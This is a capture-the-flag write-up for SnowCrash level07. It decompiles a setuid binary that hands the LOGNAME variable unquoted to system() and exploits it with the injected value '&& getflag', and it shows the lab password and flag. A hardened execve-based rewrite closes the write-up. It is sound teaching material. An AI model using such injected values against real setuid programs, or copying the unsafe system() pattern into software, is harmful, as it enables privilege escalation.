Level 07
how to login
username: level07
password: wiok45aaoguiboiki2tuin6ub
Goal
run getflag as user flag07
Actually doing something
```
level07@SnowCrash:~$ ll
total 24
dr-x------ 1 level07 level07 120 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level07 level07 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level07 level07 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x 1 flag07 level07 8805 Mar 5 2016 level07*
-r-x------ 1 level07 level07 675 Apr 3 2012 .profile*
```
seems like reverse engineering to me
```
level07@SnowCrash:~$ ./level07
level07
```
seems to be fun at parties indeed
let's crack open Ghidra
```c
int main(int argc,char **argv,char **envp)
{
    char *pcVar1;
    int iVar2;
    char *buffer;
    gid_t gid;
    uid_t uid;
    char *local_1c;
    __gid_t local_18;
    __uid_t local_14;

    local_18 = getegid();
    local_14 = geteuid();
    setresgid(local_18,local_18,local_18);
    setresuid(local_14,local_14,local_14);
    local_1c = (char *)0x0;
    pcVar1 = getenv("LOGNAME");
    asprintf(&local_1c,"/bin/echo %s ",pcVar1);
    iVar2 = system(local_1c);
    return iVar2;
}
```
we have the classic setuid dance at the beginning of the function, then a call to getenv + asprintf + system
I see a system so I know we are on track !
but let's go in order and clean up the code a bit
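```c
#define _GNU_SOURCE          /* asprintf() is a GNU extension */
#include <stdio.h>
#include <stdlib.h>

/* The setresgid()/setresuid() calls from the decompiled output are left out here. */
int main(int argc, char **argv, char **envp)
{
    char *env;
    int ret;
    char *str;

    str = NULL;
    env = getenv("LOGNAME");                 /* value is controlled by whoever runs the binary */
    asprintf(&str, "/bin/echo %s ", env);    /* pasted unquoted into a shell command line */
    ret = system(str);                       /* the string is handed to /bin/sh -c */
    return ret;
}
```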
already way better
It looks like it does something like this:
- Get the variable `LOGNAME`
- Create a string that looks like `/bin/echo $LOGNAME` using asprintf (asprintf is a way to create an allocated string with the format a regular printf would output)
- Call system to execute the created string
To me this reeks of simple && getflag, let's try it out !
```
level07@SnowCrash:~$ LOGNAME="&& getflag" ./level07
Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
```
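For contrast with the decompiled `main()` above, here is a hardened counterpart, added as an illustration and not part of the original write-up or the SnowCrash binary: it validates `LOGNAME` and runs `/bin/echo` through `execve()` with an argument vector, so no shell ever parses the value. The function names and the login-name policy are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed policy (not from the page): 1-32 chars of [a-z0-9_-], no leading digit or '-'. */
int logname_is_valid(const char *s)
{
    if (s == NULL || *s == '\0' || strchr("0123456789-", *s)) return 0;
    size_t n = strspn(s, "abcdefghijklmnopqrstuvwxyz0123456789_-");
    return s[n] == '\0' && n <= 32;
}

/* Run /bin/echo with name as ONE argv entry. No shell parses it, so "&&", ";" and
 * "$()" are plain bytes. Output is captured in out; returns its length or -1. */
ssize_t echo_no_shell(const char *name, char *out, size_t cap)
{
    int fds[2];
    if (cap == 0 || pipe(fds) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {                       /* child */
        char *const argv[] = { "echo", (char *)name, NULL };
        char *const envp[] = { NULL };    /* do not inherit the caller's environment */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        execve("/bin/echo", argv, envp);
        _exit(127);                       /* only reached if execve failed */
    }
    close(fds[1]);
    size_t total = 0;
    ssize_t n;
    while (total < cap - 1 && (n = read(fds[0], out + total, cap - 1 - total)) > 0)
        total += (size_t)n;
    out[total] = '\0';
    close(fds[0]);
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? (ssize_t)total : -1;
}

int main(void)
{
    char buf[256];
    const char *name = getenv("LOGNAME");
    if (!logname_is_valid(name) || echo_no_shell(name, buf, sizeof buf) < 0) return 1;
    return fputs(buf, stdout) == EOF;
}
```

Either measure alone closes this hole: the allowlist rejects the value before use, and the argv-based call prints it back literally even when validation is skipped.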